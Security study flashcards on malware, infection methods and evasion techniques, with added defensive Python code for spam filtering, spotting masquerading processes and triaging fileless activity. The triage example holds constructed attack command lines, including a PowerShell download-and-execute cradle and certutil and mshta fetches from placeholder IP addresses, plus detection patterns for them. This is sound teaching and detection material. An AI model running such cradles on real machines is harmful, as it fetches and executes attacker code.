Section 3 Flashcards
Two terms describe how malware reaches a victim's machine. What are they called?
Threat Vector
Attack Vector
What is a threat vector?
Method used by an attacker to access a victim’s machine
What is an attack vector?
Method used by an attacker to gain access to a victim’s machine in order
to infect it with malware
Malware infections usually start where?
Within software, messaging, and media (for example, a downloaded installer, an e-mail attachment, or a removable drive)
What is a watering hole?
Malware is planted on a website that the attacker knows the intended victims will visit, so the victims infect themselves when they browse there
What is a botnet?
A collection of compromised computers under the control of a master (command-and-control) node
What is active interception?
Occurs when a computer is placed between the sender and receiver and is able to capture or modify the traffic between them (a man-in-the-middle attack)
What is privilege escalation?
Occurs when you are able to exploit a design flaw or bug in a system to
gain access to resources that a normal user isn’t able to access
____ are used to bypass normal security and authentication functions
Backdoors
Backdoors are strongly discouraged in modern software, but what kind of backdoor is still commonly seen?
A Remote Access Trojan (RAT), placed by an attacker to maintain persistent access to the compromised host
What is a logic bomb?
a type of malicious code embedded in software that remains dormant until specific conditions are met.
What is an Easter Egg?
Non-malicious code that when invoked, displays an insider joke, hidden
message, or secret feature
True or False: Logic bombs and Easter eggs should not be used according to secure coding standards
True
What are some symptoms of infection?
- Hard drives, files, or applications are no longer accessible
- Strange noises occur
- Unusual error messages appear
- The display looks strange
- Printouts are jumbled
- Double file extensions are displayed, such as textfile.txt.exe
- New files and folders have been created, or files and folders are missing or corrupted
- System Restore will not function
What are the steps for removing malware?
1. Identify the symptoms of a malware infection
2. Quarantine the infected system (disconnect it from the network)
3. Disable System Restore (on a Windows machine), so the infection is not preserved in a restore point
4. Remediate the infected system: update the anti-malware definitions and scan; if a boot sector virus is suspected, boot the computer from an external device and scan it from there
5. Schedule automatic updates and scans
6. Enable System Restore and create a new, clean restore point
7. Provide end-user security awareness training
What is the best way to prevent a virus?
- Run an anti-virus program such as Norton or McAfee, or the Windows Defender that ships with the operating system
- Keep installing the operating system's service packs and updates (patches)
- Use a good host-based firewall
- When browsing the Internet, use encrypted (HTTPS) websites
The best way to detect worms, Trojans, and ransomware is…?
An anti-malware solution. Keep it up to date and current, both its signature definitions and its scanning engine.
What is the best way to prevent spyware?
An anti-spyware product. Third-party products are available, but Windows Defender already has this capability built in. Keep its definitions up to date so it can scan and detect properly.
Additionally, when browsing the Internet, set the browser's security settings to treat sites as untrusted by default, so that pop-ups and cookies are not accepted automatically.
How do you prevent rootkits?
Scanners can detect a rootkit before it is installed.
If the rootkit has already been installed, run the scan after booting from an external device, because a running rootkit can hide itself from scanners on the infected system. Most likely you will want to reimage the machine.
How do you prevent spam?
- Verify your e-mail servers are not configured as open mail relays (SMTP open relays)
- Remove e-mail addresses from public websites
- Use whitelists and blacklists (allow lists and deny lists) of senders
- Train and educate end users
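Two of the controls above can be checked or implemented in code. The block below is an added example, not part of the flashcards: a sender allow/deny list filter with a defined precedence (explicit address entries win over domain entries, deny beats allow at the domain level, subdomains inherit their parent's listing), plus a small probe that tests whether a mail server you administer behaves as an open relay by asking it to accept a recipient in a foreign domain from a foreign sender. The policy lists, addresses and hosts are constructed for illustration; the probe needs network access and should only be pointed at your own servers.

```python
"""Spam controls: a sender allow/deny list filter and an open-relay probe.

Added example; the policy lists and addresses are constructed, not from any real deployment.
"""
import smtplib
from email.utils import parseaddr

# Constructed policy. Explicit address entries take precedence over domain entries, so a
# trusted contact at an otherwise blocked domain still gets through, and a known spam
# sender at an allowed domain is still rejected.
ALLOW_ADDRESSES = {"billing@partner.example"}
DENY_ADDRESSES = {"noreply@deals.example.com"}
ALLOW_DOMAINS = {"example.com"}
DENY_DOMAINS = {"spam.example", "partner.example"}


def normalize_sender(header_value):
    """Extract and canonicalize the address from a From: / MAIL FROM value.

    Returns None when no usable address is present.
    """
    _display, addr = parseaddr(header_value)
    addr = addr.strip().lower()
    if "@" not in addr:
        return None
    local, domain = addr.rsplit("@", 1)
    local = local.split("+", 1)[0]  # drop plus-addressing tags: user+tag@ -> user@
    return f"{local}@{domain}"


def domain_listed(domain, listed_domains):
    """True when the domain itself or one of its parent domains is on the list."""
    return any(domain == d or domain.endswith("." + d) for d in listed_domains)


def classify_sender(header_value):
    """Return (decision, reason) using the precedence:
    address allow > address deny > domain deny > domain allow > default accept."""
    addr = normalize_sender(header_value)
    if addr is None:
        return "reject", "no parseable sender address"
    domain = addr.rsplit("@", 1)[1]
    if addr in ALLOW_ADDRESSES:
        return "accept", "sender address is on the allow list"
    if addr in DENY_ADDRESSES:
        return "reject", "sender address is on the deny list"
    if domain_listed(domain, DENY_DOMAINS):
        return "reject", "sender domain is on the deny list"
    if domain_listed(domain, ALLOW_DOMAINS):
        return "accept", "sender domain is on the allow list"
    return "accept", "no list matched; default policy"


def is_open_relay(host, port=25, timeout=10):
    """Probe a mail server you administer. An open relay accepts RCPT TO for a domain it
    does not host, from a sender it does not host. Requires network access (not run offline).
    The .invalid addresses are reserved names, so nothing can actually be delivered."""
    with smtplib.SMTP(host, port, timeout=timeout) as smtp:
        smtp.ehlo()
        code, _ = smtp.mail("probe@sender.invalid")
        if code != 250:
            return False
        code, _ = smtp.rcpt("probe@recipient.invalid")
        smtp.rset()  # abandon the transaction before disconnecting
        return code == 250


if __name__ == "__main__":
    for sender in ('"Partner Billing" <Billing+inv@partner.example>',
                   "noreply@deals.example.com", "alice@mail.spam.example",
                   "bob@example.com", "carol@unknown.example"):
        print(sender, "->", classify_sender(sender))
```

The filter normalizes before matching (display names stripped, case folded, plus-tags removed) so that trivially varied sender strings cannot slip past an exact-match list; the relay probe returns True only when the server says 250 to a recipient it has no business relaying for.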
What are the three best practices to remember when it comes to preventing malware?
- Update your anti-malware software automatically and scan your computer
- Update and patch the operating system and applications regularly
- Educate and train end users on safe Internet surfing practices
What is a malware exploit technique?
Describes the specific method by which malware code infects a target host
Most modern malware uses ___ techniques to avoid detection by signature-based security software
Fileless. The malware is executed directly as a script or a small piece of shellcode that creates a process in system memory, without writing an executable to the local file system for a scanner to examine.
How does an APT use modern malware to operate?
Step 1: Dropper or Downloader - A dropper is a specialized type of malware designed to install or run other malware embedded in a payload on an infected host. The first code the victim runs is usually a stage-one dropper; once it runs, it uses a downloader to fetch the next stage. A downloader is a piece of code that connects to the Internet to retrieve additional tools after the initial infection by the dropper.
Step 2: Maintain Access -
Step 3: Strengthen Access -
Step 4: Actions on objectives -
Step 5: Concealment -
What is a dropper?
Malware designed to install or run other types of malware embedded in a
payload on an infected host
What is a downloader?
A piece of code that connects to the Internet to retrieve additional tools after the
initial infection by a dropper
What is shellcode?
Any lightweight code designed to run an exploit on the target, which may include
any type of code format from scripting languages to binary code
What is code injection?
Exploit technique that runs malicious code under the process ID of a legitimate process. Every process has a unique ID; by injecting its code into a process that is allowed to run, such as Windows Explorer, the malware shows up in process listings and logs as that legitimate process, which hides it from casual inspection.
What are some code injection techniques?
- Masquerading
- DLL injection
- DLL sideloading
- Process hollowing
How does masquerading code injection work?
The dropper replaces a genuine executable with a malicious one (or gives the malicious file the name of a legitimate one) so that it runs in its place.
How does DLL injection work?
The dropper forces a running legitimate process to load the malicious code as a DLL, so the code executes inside that process.
How does DLL sideloading work?
The dropper exploits a vulnerability in how a legitimate program's manifest locates its DLLs, so that the program loads a malicious DLL at runtime in place of the expected one.
How does process hollowing work?
The dropper starts a legitimate process in a suspended state, then rewrites the memory locations containing the process code with the malware code before resuming it. The process keeps its legitimate name and image path while actually running attacker code.
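Each of these techniques leaves a trace a defender can look for in a process listing. The block below is an added example, not from the flashcards, that hunts for the masquerading variants: a system binary name running from outside the Windows system directories, a lookalike name one character away from a real one (svch0st.exe), and a core process with the wrong parent (which is how a hollowed or injected copy started from a user process stands out, since the on-disk path looks legitimate). The process table is constructed to resemble tasklist / Get-Process output; the expected-parent map covers only the core Windows boot chain and is not exhaustive. Detecting process hollowing itself requires comparing the in-memory image to the file on disk, which a listing alone cannot show.

```python
"""Hunt for masquerading processes in a process table.

Added example with a constructed process table; the system-binary and parent tables
below are a small subset of Windows, not a complete reference.
"""

# Directories from which these system binaries legitimately run (lower-cased prefixes).
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
SYSTEM_BINARIES = {"smss.exe", "csrss.exe", "wininit.exe", "winlogon.exe", "services.exe",
                   "lsass.exe", "svchost.exe", "dllhost.exe", "conhost.exe"}
# Documented parent of each core process in the Windows boot chain; anything else is suspicious.
EXPECTED_PARENT = {"csrss.exe": {"smss.exe"}, "wininit.exe": {"smss.exe"},
                   "winlogon.exe": {"smss.exe"}, "services.exe": {"wininit.exe"},
                   "lsass.exe": {"wininit.exe"}, "svchost.exe": {"services.exe"}}

# Constructed sample: a normal boot chain plus three suspicious entries under explorer.exe.
SAMPLE_PROCESSES = [
    {"pid": 400,  "ppid": 4,    "name": "smss.exe",     "path": r"C:\Windows\System32\smss.exe"},
    {"pid": 500,  "ppid": 400,  "name": "wininit.exe",  "path": r"C:\Windows\System32\wininit.exe"},
    {"pid": 600,  "ppid": 500,  "name": "services.exe", "path": r"C:\Windows\System32\services.exe"},
    {"pid": 650,  "ppid": 500,  "name": "lsass.exe",    "path": r"C:\Windows\System32\lsass.exe"},
    {"pid": 800,  "ppid": 600,  "name": "svchost.exe",  "path": r"C:\Windows\System32\svchost.exe"},
    {"pid": 3900, "ppid": 3800, "name": "explorer.exe", "path": r"C:\Windows\explorer.exe"},
    {"pid": 4100, "ppid": 3900, "name": "svchost.exe",  "path": r"C:\Users\Public\svchost.exe"},
    {"pid": 4200, "ppid": 3900, "name": "svch0st.exe",  "path": r"C:\Users\bob\AppData\Roaming\svch0st.exe"},
    {"pid": 4300, "ppid": 3900, "name": "lsass.exe",    "path": r"C:\Windows\System32\lsass.exe"},
]


def edit_distance(a, b):
    """Levenshtein distance, used to catch one-character lookalike names."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def find_masquerading(processes):
    """Return {pid: [reasons]} for every process that fails a masquerading check."""
    by_pid = {p["pid"]: p for p in processes}
    findings = {}
    for p in processes:
        name = p["name"].lower()
        path = p["path"].lower()
        parent = by_pid.get(p["ppid"])
        parent_name = parent["name"].lower() if parent else "<unknown>"
        reasons = []
        if name in SYSTEM_BINARIES and not path.startswith(SYSTEM_DIRS):
            reasons.append(f"system binary name running from {p['path']}")
        elif name not in SYSTEM_BINARIES:
            lookalikes = [s for s in SYSTEM_BINARIES if edit_distance(name, s) == 1]
            if lookalikes:
                reasons.append(f"name resembles {lookalikes[0]}")
        if name in EXPECTED_PARENT and parent_name not in EXPECTED_PARENT[name]:
            reasons.append(f"unexpected parent {parent_name}")
        if reasons:
            findings[p["pid"]] = reasons
    return findings


if __name__ == "__main__":
    for pid, reasons in find_masquerading(SAMPLE_PROCESSES).items():
        print(pid, "; ".join(reasons))
```

The path check catches the copied-binary form of masquerading, the edit-distance check catches renamed droppers, and the parent check catches a legitimate image started from the wrong place, which is the visible symptom of hollowing when the attacker got the path right.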
Droppers are likely to implement ____ techniques to prevent detection and analysis
Anti-forensics
Anti-forensic techniques include encrypting, compressing, or obfuscating the payload so that scanners and analysts cannot read it directly.
Exploit techniques that use standard system tools and packages to perform intrusions are called…?
Living off the Land
For example, PowerShell can be used for all sorts of malicious activity, so an attacker (or a pentester) who breaks into a Windows system can use the victim's own PowerShell against them; on a Linux system the equivalent is Bash scripting. Because these tools are native to the operating system and were already installed for the administrators, the attacker's activity blends in with normal administration. An adversary living off the land is much harder to detect, because the malicious code executes within standard tools and processes, and that lets them stay on the system much longer.
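Fileless execution, obfuscated payloads and living off the land all leave their trace in the same place: the process creation record, since the script or shellcode still has to be launched by some process with some command line. The block below is an added example, not part of the flashcards, that triages records shaped like Windows Security event 4688 / Sysmon event 1 fields (parent image, image, command line). It decodes PowerShell's -EncodedCommand argument (base64 over UTF-16LE) so the real script can be inspected, flags download cradles and script-hosting system binaries (certutil, mshta, rundll32), and flags an Office application spawning a script host. The records and the pattern list are constructed for illustration and are not a complete detection rule set.

```python
"""Triage process-creation records for fileless / living-off-the-land activity.

Added example; the records are constructed in the shape of Windows 4688 / Sysmon Event 1
fields, and the pattern list is illustrative rather than exhaustive.
"""
import base64
import ntpath
import re

# PowerShell's encoded-command switch in any of its accepted abbreviations.
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

# Command-line fragments typical of download cradles and script-hosting LOLBins.
SUSPICIOUS_PATTERNS = [
    (r"\bIEX\b|Invoke-Expression", "invoke-expression"),
    (r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer", "download cradle"),
    (r"certutil(?:\.exe)?\s.*-urlcache", "certutil download"),
    (r"\bmshta(?:\.exe)?\s+https?://", "mshta remote script"),
    (r"rundll32(?:\.exe)?\s.*javascript:", "rundll32 javascript"),
    (r"-(?:w|win|windowstyle)\s+hidden", "hidden window"),
]
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "certutil.exe", "rundll32.exe", "regsvr32.exe"}


def encode_powershell(script):
    """Build the -EncodedCommand form (UTF-16LE, then base64) that obscures a one-liner."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the plaintext of an -EncodedCommand argument, or None if absent/undecodable."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/s.ps1')"
SAMPLE_EVENTS = [  # constructed records: one benign, three malicious
    {"parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": r"powershell.exe -NoProfile -Command Get-ChildItem C:\Users"},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", "image": PS,
     "cmdline": "powershell.exe -w hidden -nop -enc " + encode_powershell(CRADLE)},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://198.51.100.7/a.bin C:\Users\Public\a.bin"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://203.0.113.9/p.hta"},
]


def analyze_event(event):
    """Return the list of reasons an event is suspicious (empty when it looks benign)."""
    reasons = []
    text = event["cmdline"]
    decoded = decode_encoded_command(text)
    if decoded is not None:
        reasons.append("encoded command")
        # Swap the opaque base64 blob for its plaintext so the patterns see the real script.
        text = ENCODED_FLAG.sub(lambda _m: " " + decoded + " ", text, count=1)
    for pattern, label in SUSPICIOUS_PATTERNS:
        if re.search(pattern, text, re.I):
            reasons.append(label)
    parent = ntpath.basename(event["parent"]).lower()
    image = ntpath.basename(event["image"]).lower()
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        reasons.append(f"{parent} spawned {image}")
    return reasons


def triage(events):
    """Map the index of each flagged event to its reasons; clean events are omitted."""
    flagged = {}
    for i, event in enumerate(events):
        reasons = analyze_event(event)
        if reasons:
            flagged[i] = reasons
    return flagged


if __name__ == "__main__":
    for i, reasons in triage(SAMPLE_EVENTS).items():
        print(i, SAMPLE_EVENTS[i]["cmdline"][:60], "->", reasons)
```

The decode step matters more than any single pattern: a signature that only looks at the raw command line sees a base64 string, while the decoded text exposes the Invoke-Expression download cradle that would otherwise never touch disk.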
What is APT?
An advanced persistent threat (APT) is a broad term used to describe an attack campaign in which an intruder, or team of intruders, establishes an illicit, long-term presence on a network in order to mine highly sensitive data.